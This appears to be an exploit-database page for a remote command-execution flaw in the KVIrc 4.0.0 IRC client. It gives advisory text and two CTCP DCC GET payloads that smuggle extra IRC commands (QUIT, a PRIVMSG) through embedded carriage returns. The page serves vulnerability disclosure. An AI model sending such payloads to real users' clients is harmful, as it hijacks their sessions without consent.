header-logo
Suggest Exploit
vendor:
KVIrc
by:
7.5
CVSS
HIGH
Remote Command Execution
CWE
Product Name: KVIrc
Affected Version From: 4.0.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:kvirc:kvirc:4.0.0
Metasploit:
Other Scripts:
Platforms Tested:

Remote Command Execution in KVIrc

The vulnerability allows an attacker to execute arbitrary commands within the context of the affected KVIrc application by exploiting insufficient input sanitization.

Mitigation:

The vendor should release a patch or update that properly sanitizes user-supplied input to prevent command execution.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42026/info

KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application.

KVIrc 4.0.0 is vulnerable; other versions may also be affected. 

/ctcp nickname DCC GET\rQUIT\r
/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r

Navigation

Suggest Exploit

Services By CQR